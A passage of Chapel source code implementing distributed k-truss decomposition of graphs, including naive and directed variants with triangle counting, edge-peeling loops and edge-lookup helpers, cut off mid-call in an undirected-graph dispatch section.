                                          }
                                       }
                                   }
                                }
                             }
                         }// end of wedge/cycle counting for edge i
                     }// end of forall. We get the number of triangles for each edge
                  }// end of on loc
              } // end of coforall loc in Locales
          }
          //writeln("after Triangle coutning");
          ConFlag=true;
          // Peeling rounds: remove low-support edges, propagate decrements, bump k.
          while (ConFlag) {
              coforall loc in Locales with (ref SetCurF ) {
                 on loc {
                     var ld = src.localSubdomain();
                     var startEdge = ld.low;
                     var endEdge = ld.high;
                     // each locale only handles the edges owned by itself
                     forall i in startEdge..endEdge with(ref SetCurF){
                         if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
                              EdgeDeleted[i] = 1-k;
                              SetCurF.add(i);
                         }
                     }
                 }// end of on loc
              } // end of coforall loc in Locales
              ConFlag=false;
              // we try to remove as many edges as possible in the following code
              var tmpN2=0:int;
              while (SetCurF.getSize()>0) {
                  //first we build the edge set that will be affected by the removed edges in SetCurF
                  coforall loc in Locales with ( ref SetNextF) {
                      on loc {
                           var ld = src.localSubdomain();
                           var startEdge = ld.low;
                           var endEdge = ld.high;
                           forall i in SetCurF with (ref SetNextF) {
                              if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
                                  var v1=src[i];
                                  var v2=dst[i];
                                  var dv1=nei[v1];
                                  var dv2=nei[v2];
                                  {
                                      // wedge case: triangles through v1's out-edges
                                      var nextStart=start_i[v1];
                                      var nextEnd=start_i[v1]+nei[v1]-1;
                                      if (nei[v1]>1) {
                                         forall j in nextStart..nextEnd with (ref SetNextF){
                                             var v3=src[j];//v3==v1
                                             var v4=dst[j];
                                             var tmpe:int;
                                             if ( (EdgeDeleted[j]<=-1) && ( v2!=v4 ) ) {
                                                 //v1->v2, v1->v4
                                                 tmpe=findEdge(v2,v4);
                                                 if (tmpe!=-1) {// there is such third edge
                                                     if ( EdgeDeleted[tmpe]<=-1 ) {
                                                         if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
                                                             TriCount[tmpe].sub(1);
                                                             if TriCount[tmpe].read() <k-2 {
                                                                 SetNextF.add((i,tmpe));
                                                             }
                                                             TriCount[j].sub(1);
                                                             if TriCount[j].read() <k-2 {
                                                                 SetNextF.add((i,j));
                                                             }
                                                         } else {
                                                             //if ((EdgeDeleted[j]==-1) && (i<tmpe)) {
                                                             if ((EdgeDeleted[j]==-1) ) {
                                                                 TriCount[j].sub(1);
                                                                 if TriCount[j].read() <k-2 {
                                                                     SetNextF.add((i,j));
                                                                 }
                                                             } else {
                                                                 if ((EdgeDeleted[tmpe]==-1) &&(i<j)) {
                                                                     TriCount[tmpe].sub(1);
                                                                     if TriCount[tmpe].read()<k-2 {
                                                                         SetNextF.add((i,tmpe));
                                                                         //EdgeDeleted[tmpe]=1-k;
                                                                     }
                                                                 }
                                                             }
                                                         }
                                                     }
                                                 }
                                             }// end of if EdgeDeleted[j]<=-1
                                         }// end of forall j in nextStart..nextEnd
                                      }// end of if nei[v1]>1
                                      nextStart=start_i[v2];
                                      nextEnd=start_i[v2]+nei[v2]-1;
                                      if (nei[v2]>0) {
                                         forall j in nextStart..nextEnd with (ref SetNextF){
                                             var v3=src[j];//v3==v2
                                             var v4=dst[j];
                                             var tmpe:int;
                                             if ( (EdgeDeleted[j]<=-1) && ( v1!=v4 ) ) {
                                                 tmpe=exactEdge(v4,v1);
                                                 // cycle case v1->v2->v4->v1
                                                 if (tmpe!=-1) {// there is such third edge
                                                     if ( EdgeDeleted[tmpe]<=-1 ) {
                                                         if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
                                                             TriCount[tmpe].sub(1);
                                                             if TriCount[tmpe].read() <k-2 {
                                                                 SetNextF.add((i,tmpe));
                                                             }
                                                             TriCount[j].sub(1);
                                                             if TriCount[j].read() <k-2 {
                                                                 SetNextF.add((i,j));
                                                             }
                                                         } else {
                                                             if ((EdgeDeleted[j]==-1) && (i<tmpe) ) {
                                                                 TriCount[j].sub(1);
                                                                 if TriCount[j].read() <k-2 {
                                                                     SetNextF.add((i,j));
                                                                 }
                                                             } else {
                                                                 if ((EdgeDeleted[tmpe]==-1) && (i<j) ) {
                                                                     TriCount[tmpe].sub(1);
                                                                     if TriCount[tmpe].read() <k-2 {
                                                                         SetNextF.add((i,tmpe));
                                                                     }
                                                                 }
                                                             }
                                                         }
                                                     }
                                                 }
                                             }
                                         }// end of forall j in nextStart..nextEnd
                                      }// end of if
                                      //check the case of x->v1 and x->v2
                                      nextStart=start_iR[v1];
                                      nextEnd=start_iR[v1]+neiR[v1]-1;
                                      var dv1=neiR[v1];
                                      var dv2=neiR[v2];
                                      // walk the smaller reverse adjacency list of the two endpoints
                                      if ((dv1<=dv2) && (dv1>0)) {
                                          forall j in nextStart..nextEnd with (ref SetNextF){
                                              var v3=srcR[j];//v3==v1
                                              var v4=dstR[j];
                                              var e2=exactEdge(v4,v3);
                                              if (EdgeDeleted[e2]==-1) {
                                                  var tmpe=exactEdge(v4,v2);
                                                  if (tmpe!=-1) {
                                                      if (EdgeDeleted[tmpe]==-1) {
                                                          TriCount[e2].sub(1);
                                                          if TriCount[e2].read() <k-2 {
                                                              SetNextF.add((i,e2));
                                                          }
                                                          TriCount[tmpe].sub(1);
                                                          if TriCount[tmpe].read() <k-2 {
                                                              SetNextF.add((i,tmpe));
                                                          }
                                                      }
                                                  }
                                              }
                                          }
                                      } else {
                                          if (dv2>0) {
                                              nextStart=start_iR[v2];
                                              nextEnd=start_iR[v2]+neiR[v2]-1;
                                              forall j in nextStart..nextEnd with (ref SetNextF){
                                                  var v3=srcR[j];//v3==v2
                                                  var v4=dstR[j];
                                                  var e2=exactEdge(v4,v3);
                                                  if (EdgeDeleted[e2]==-1) {
                                                      var tmpe=exactEdge(v4,v1);
                                                      if (tmpe!=-1) {
                                                          if (EdgeDeleted[tmpe]==-1) {
                                                              TriCount[e2].sub(1);
                                                              if TriCount[e2].read() <k-2 {
                                                                  SetNextF.add((i,e2));
                                                              }
                                                              TriCount[tmpe].sub(1);
                                                              if TriCount[tmpe].read() <k-2 {
                                                                  SetNextF.add((i,tmpe));
                                                              }
                                                          }
                                                      }
                                                  }
                                              }
                                          }
                                      }
                                  }
                              } // end if (xlocal(i,startEdge,endEdge)
                           } // end forall i in SetCurF with (ref SetNextF)
                      } //end on loc
                  } //end coforall loc in Locales
                  // finalize this round: promote the tentative 1-k marks to the final value k-1
                  coforall loc in Locales with (ref SetCurF ) {
                      on loc {
                         var ld = src.localSubdomain();
                         var startEdge = ld.low;
                         var endEdge = ld.high;
                         forall i in SetCurF {
                             if (xlocal(i,startEdge,endEdge) && (EdgeDeleted[i]==1-k)) {//each local only check the owned edges
                                   EdgeDeleted[i]=k-1;
                             }
                         }
                      }
                  }
                  SetCurF.clear();
                  coforall loc in Locales with (ref SetNextF ) {
                      on loc {
                         var ld = src.localSubdomain();
                         var startEdge = ld.low;
                         var endEdge = ld.high;
                         forall (i,j) in SetNextF {
                            if (xlocal(j,startEdge,endEdge)) {//each local only check the owned edges
                                      // NOTE(review): unlike TrussDecomposition, no EdgeDeleted[j]==-1
                                      // guard before re-marking — verify duplicate frontier entries are benign
                                      EdgeDeleted[j]=1-k;
                                      SetCurF.add(j);
                            }
                         }// end of forall
                      }
                  }
                  SetNextF.clear();
                  tmpN2+=1;
              }// end of while
              var tmpi=0;
              ConFlag=false;
              //writeln("k=",k);
              while tmpi<Ne {
                  if (EdgeDeleted[tmpi]==-1) {
                      // some edge survived this k: move on to the next truss level
                      ConFlag=true;
                      k+=1;
                      break;
                  }
                  tmpi+=1;
              }
              N2+=1;
          }// end while
          timer.stop();
          outMsg="After KTruss Decomposition Mix , Max K ="+(k-1):string;
          smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
          outMsg="After KTruss Decomposition Mix ,Total execution time="+(timer.elapsed()):string;
          smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
          outMsg="After KTruss Decomposition Mix ,Total number of iterations ="+N2:string;
          smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
          // publish EdgeDeleted (per-edge truss levels) through the symbol table
          var countName = st.nextName();
          var countEntry = new shared SymEntry(EdgeDeleted);
          st.addEntry(countName, countEntry);
          var cntMsg = 'created ' + st.attrib(countName);
          return cntMsg;
      } // end of proc TrussDecompositionMix
      proc TrussNaiveDecompositionDirected(kvalue:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int):string throws{
          // Naive truss decomposition for a directed graph: count triangles once up
          // front, then repeatedly remove edges with support below k-2, incrementing k
          // whenever a round removes nothing, until no live edge remains.
          //
          // kvalue              : initial k to start the decomposition from
          // nei,start_i,src,dst : CSR-style arrays of the (forward) edge lists
          // returns             : message naming the symbol-table entry holding EdgeDeleted
          //
          // NOTE(review): this "naive" variant never decrements TriCount after edges are
          // removed, and the 1-k marks are never promoted to k-1 — confirm that is the
          // intended naive behavior before relying on the reported truss levels.
          var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
          var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
          var N2=0:int;
          var ConFlag=true:bool;
          EdgeDeleted=-1;
          var RemovedEdge=0: int;
          var TriCount=makeDistArray(Ne,atomic int);
          var EReverse=makeDistArray(Ne,set((int,int),parSafe = true) );
          var k=kvalue;
          forall i in TriCount {
              i.write(0);
          }
          var timer:Timer;
          // Mark edge `cur` as deleted (value k-1) when it duplicates an earlier <u,v>,
          // or duplicates the reverse <v,u> when u>v; returns the duplicate's edge ID or -1.
          proc RemoveDuplicatedEdges( cur: int):int {
               if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
                    return -1;
               }
               var u=src[cur]:int;
               var v=dst[cur]:int;
               var lu=start_i[u]:int;
               var nu=nei[u]:int;
               var lv=start_i[v]:int;
               var nv=nei[v]:int;
               var DupE:int;
               if ((nu<=1) || (cur<=lu)) {
                   DupE=-1;
               } else {
                   // look for an earlier copy of <u,v> inside u's edge list
                   DupE =binSearchE(dst,lu,cur-1,v);
               }
               if (DupE!=-1) {
                    EdgeDeleted[cur]=k-1;
               } else {
                   if (u>v) {
                      // u>v: the canonical direction <v,u> may already exist; check v's list
                      if (nv<=0) {
                         DupE=-1;
                      } else {
                         DupE=binSearchE(dst,lv,lv+nv-1,u);
                      }
                      if (DupE!=-1) {
                           EdgeDeleted[cur]=k-1;
                      }
                   }
               }
               return DupE;
          }
          // given vertices u and v, return the edge ID e=<u,v> or e=<v,u>
          proc findEdge(u:int,v:int):int {
               //given the destination array ary, the edge range [l,h], return the edge ID e where ary[e]=key
               if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
                    return -1;
                    // we do not accept self-loop
               }
               var beginE=start_i[u];
               var eid=-1:int;
               if (nei[u]>0) {
                    if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
                         eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
                         // search <u,v> in undirect edges
                    }
               }
               if (eid==-1) {// if b
                    // <u,v> not stored; try the opposite orientation <v,u>
                    beginE=start_i[v];
                    if (nei[v]>0) {
                         if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
                              eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
                              // search <v,u> in undirect edges
                         }
                    }
               }// end of if b
               return eid;
          }// end of proc findEdge(u:int,v:int)
          // given vertices u and v, return the edge ID e=<u,v>
          proc exactEdge(u:int,v:int):int {
               //given the destination array ary, the edge range [l,h], return the edge ID e where ary[e]=key
               if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
                    return -1;
                    // we do not accept self-loop
               }
               var beginE=start_i[u];
               var eid=-1:int;
               if (nei[u]>0) {
                    if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
                         eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
                         // search <u,v> in undirect edges
                    }
               }
               return eid;
          }// end of proc exactEdge(u:int,v:int)
          //here we begin the first naive version
          // preprocessing: drop self-loops and duplicated edges, locale by locale
          coforall loc in Locales {
              on loc {
                   var ld = src.localSubdomain();
                   var startEdge = ld.low;
                   var endEdge = ld.high;
                   forall i in startEdge..endEdge {
                       var v1=src[i];
                       var v2=dst[i];
                       if ( v1==v2) {
                            EdgeDeleted[i]=k-1;
                            //writeln("My locale=",here.id," Find self-loop ",i,"=<",src[i],",",dst[i],">");
                       }
                       if (EdgeDeleted[i]==-1) {
                            var DupE= RemoveDuplicatedEdges(i);
                            if (DupE!=-1) {
                                 //we find duplicated edge
                            }
                       }
                   }
              }
          }// end of coforall loc
          timer.start();
          //writeln("After Preprocessing");
          //we will try to remove all the unnecessary edges in the graph
          {
              //ConFlag=false;
              // first we calculate the number of triangles
              coforall loc in Locales with ( ref SetNextF) {
                  on loc {
                     var ld = src.localSubdomain();
                     var startEdge = ld.low;
                     var endEdge = ld.high;
                     forall i in startEdge..endEdge {
                         TriCount[i].write(0);
                     }
                     //forall i in startEdge..endEdge with(ref SetCurF){
                     forall i in startEdge..endEdge {
                         var u = src[i];
                         var v = dst[i];
                         var du=nei[u];
                         var dv=nei[v];
                         {
                             var beginTmp=start_i[u];
                             var endTmp=beginTmp+nei[u]-1;
                             if ((EdgeDeleted[i]==-1) && (u!=v) ){
                                if ( (nei[u]>1) ){
                                   //forall x in dst[beginTmp..endTmp] with (ref uadj) {
                                   // wedge case through u's out-edges; i<e avoids double counting
                                   forall x in dst[beginTmp..endTmp] {
                                       var e=findEdge(u,x);//here we find the edge ID to check if it has been removed
                                       if (e==-1){
                                          //writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
                                       } else {
                                          if ((EdgeDeleted[e] ==-1) && (x !=v) && (i<e)) {
                                              var e3=findEdge(x,v);
                                              if (e3!=-1) {
                                                  if (EdgeDeleted[e3]==-1) {
                                                      // one triangle {i,e,e3}: bump all three supports
                                                      TriCount[i].add(1);
                                                      TriCount[e].add(1);
                                                      TriCount[e3].add(1);
                                                      EReverse[e3].add((i,e));
                                                  }
                                              }
                                          }
                                       }
                                   }
                                }
                             }
                             beginTmp=start_i[v];
                             endTmp=beginTmp+nei[v]-1;
                             if ((EdgeDeleted[i]==-1) && (u!=v) ){
                                if ( (nei[v]>0) ){
                                   //forall x in dst[beginTmp..endTmp] with (ref vadj) {
                                   // cycle case through v's out-edges; src/dst check pins orientation
                                   forall x in dst[beginTmp..endTmp] {
                                       var e=findEdge(v,x);//here we find the edge ID to check if it has been removed
                                       if (e==-1){
                                          //writeln("vertex ",x," and ",v," findEdge Error self-loop or no such edge");
                                       } else {
                                          if ((EdgeDeleted[e] ==-1) && (x !=u) && (i<e)) {
                                              //var e3=findEdge(x,v);
                                              var e3=findEdge(x,u);
                                              if (e3!=-1) {
                                                  if ((EdgeDeleted[e3]==-1) && (src[e3]==x) && (dst[e3]==u) && (i<e3)) {
                                                      TriCount[i].add(1);
                                                      TriCount[e].add(1);
                                                      TriCount[e3].add(1);
                                                  }
                                              }
                                          }
                                       }
                                   }
                                }
                             }
                         }// end of wedge/cycle counting for edge i
                     }// end of forall. We get the number of triangles for each edge
                  }// end of on loc
              } // end of coforall loc in Locales
          } // end of triangle counting
          // naive peeling: mark low-support edges, bump k when a round removes nothing
          while (ConFlag) {
              coforall loc in Locales with (ref SetCurF ) {
                 on loc {
                     var ld = src.localSubdomain();
                     var startEdge = ld.low;
                     var endEdge = ld.high;
                     forall i in startEdge..endEdge with(ref SetCurF){
                         // NOTE(review): empty loop body — looks like leftover scaffolding; confirm before removing
                     }
                 }// end of on loc
              } // end of coforall loc in Locales
              coforall loc in Locales with (ref SetCurF ) {
                 on loc {
                     var ld = src.localSubdomain();
                     var startEdge = ld.low;
                     var endEdge = ld.high;
                     // each locale only handles the edges owned by itself
                     forall i in startEdge..endEdge with(ref SetCurF){
                         if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
                              EdgeDeleted[i] = 1-k;
                              SetCurF.add(i);
                         }
                     }
                 }// end of on loc
              } // end of coforall loc in Locales
              if ( SetCurF.getSize()<=0){
                  //ConFlag=false;
                  // nothing removable at this k: advance to the next truss level
                  k+=1;
              }
              SetCurF.clear();
              var tmpi=0;
              ConFlag=false;
              // keep iterating while at least one edge is still alive
              while tmpi<Ne {
                  if (EdgeDeleted[tmpi]==-1) {
                      ConFlag=true;
                      break;
                  } else {
                      tmpi+=1;
                  }
              }
              N2+=1;
          }// end while
          timer.stop();
          AllRemoved=true;
          // count how many edges were removed overall (tmpi) and whether any survive
          var tmpi=0;
          for i in 0..Ne-1 {
              if (EdgeDeleted[i]==-1) {
                  AllRemoved=false;
              } else {
                  tmpi+=1;
              }
          }
          outMsg="After KTruss Naive Decomposition Directed , Max K ="+(k-1):string;
          smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
          outMsg="After KTruss Naive Decomposition Directed,Total execution time="+(timer.elapsed()):string;
          smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
          outMsg="After KTruss Naive Decomposition Directed,Total number of iterations ="+N2:string;
          smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
          outMsg="After KTruss Naive Decomposition Directed,Totally remove "+tmpi:string+ " Edges";
          smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
          // publish EdgeDeleted (per-edge truss levels) through the symbol table
          var countName = st.nextName();
          var countEntry = new shared SymEntry(EdgeDeleted);
          st.addEntry(countName, countEntry);
          var cntMsg = 'created ' + st.attrib(countName);
          return cntMsg;
      } // end of proc TrussNaiveDecompositionDirected
      //For a directed graph, use the directed method.
proc TrussDecompositionDirected(kvalue:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N2=0:int;
var k=kvalue;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var TriCount=makeDistArray(Ne,atomic int);
var EReverse=makeDistArray(Ne,set((int,int),parSafe = true) );
forall i in TriCount {
i.write(0);
}
var timer:Timer;
proc RemoveDuplicatedEdges( cur: int):int {
if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}// end of proc exatEdge(u:int,v:int)
//here we begin the first naive version
coforall loc in Locales {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( v1==v2) {
EdgeDeleted[i]=k-1;
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//writeln("After Preprocessing");
timer.start();
//we will try to remove all the unnecessary edges in the graph
while (ConFlag) {
//ConFlag=false;
// first we calculate the number of triangles
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge {
TriCount[i].write(0);
}
//forall i in startEdge..endEdge with(ref SetCurF){
forall i in startEdge..endEdge {
var u = src[i];
var v = dst[i];
var du=nei[u];
var dv=nei[v];
{
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>1) ){
//forall x in dst[beginTmp..endTmp] with (ref uadj) {
forall x in dst[beginTmp..endTmp] {
var e=findEdge(u,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=v) && (i<e)) {
var e3=findEdge(x,v);
if (e3!=-1) {
if (EdgeDeleted[e3]==-1) {
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
EReverse[e3].add((i,e));
}
}
}
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[v]>0) ){
//forall x in dst[beginTmp..endTmp] with (ref vadj) {
forall x in dst[beginTmp..endTmp] {
var e=findEdge(v,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",v," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=u) && (i<e)) {
//var e3=findEdge(x,v);
var e3=findEdge(x,u);
if (e3!=-1) {
if ((EdgeDeleted[e3]==-1) && (src[e3]==x) && (dst[e3]==u) && (i<e3)) {
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
}
}
}
}
}
}
}
}// end of if du<=dv
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
// we try to remove as many edges as possible in the following code
var tmpN2=0:int;
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1];
var dv2=nei[v2];
{
var nextStart=start_i[v1];
var nextEnd=start_i[v1]+nei[v1]-1;
if (nei[v1]>1) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( v2!=v4 ) ) {
tmpe=findEdge(v2,v4);
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
//if ((EdgeDeleted[j]==-1) && (i<tmpe)) {
if ((EdgeDeleted[j]==-1) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<j)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read()<k-2 {
SetNextF.add((i,tmpe));
//EdgeDeleted[tmpe]=1-k;
}
}
}
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_i[v2];
nextEnd=start_i[v2]+nei[v2]-1;
if (nei[v2]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v2
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( v1!=v4 ) ) {
tmpe=exactEdge(v4,v1);
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[j]==-1) && (i<tmpe) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[tmpe]==-1) && (i<j) ) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
if EReverse[i].size>0 {
forall (e1,e2) in EReverse[i] {
if ((EdgeDeleted[e1]==-1) && (EdgeDeleted[e2]==-1)) {
TriCount[e1].sub(1);
if TriCount[e1].read() <k-2 {
SetNextF.add((i,e1));
}
TriCount[e2].sub(1);
if TriCount[e2].read() <k-2 {
SetNextF.add((i,e2));
}
}
}
}
}
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge) && (EdgeDeleted[i]==1-k)) {//each local only check the owned edges
EdgeDeleted[i]=k-1;
}
}
}
}
SetCurF.clear();
coforall loc in Locales with (ref SetNextF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
var rset = new set((int,int), parSafe = true);
forall (i,j) in SetNextF with(ref rset) {
if (xlocal(j,startEdge,endEdge)) {//each local only check the owned edges
EdgeDeleted[j]=1-k;
SetCurF.add(j);
// rset.add((i,j));// just want (i,j) is unique in rset
}
}// end of forall
}
}
SetNextF.clear();
tmpN2+=1;
}// end of while
var tmpi=0;
ConFlag=false;
while tmpi<Ne {
if (EdgeDeleted[tmpi]==-1) {
ConFlag=true;
k+=1;
break;
}
tmpi+=1;
}
N2+=1;
}// end while
timer.stop();
outMsg="After KTruss Decomposition Directed , Max K ="+(k-1):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Decomposition Directed ,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Decomposition Directed ,Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc KTrussDecompositionDirected
var kLow=3:int;
var kUp:int;
var kMid:int;
var maxtimer:Timer;
if (!Directed) {//for undirected graph
if (kValue>0) {// k-truss analysis
var PTriCount=makeDistArray(Ne,int);
PTriCount=0;
repMsg=kTrussNaiveListIntersection(kValue,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a,
PTriCount);
PTriCount=0;
repMsg=kTrussNaiveSetSearchSmall(kValue,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a,
PTriCount);
PTriCount=0;
repMsg=kTrussNaiveSetSearchSmallSeq(kValue,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
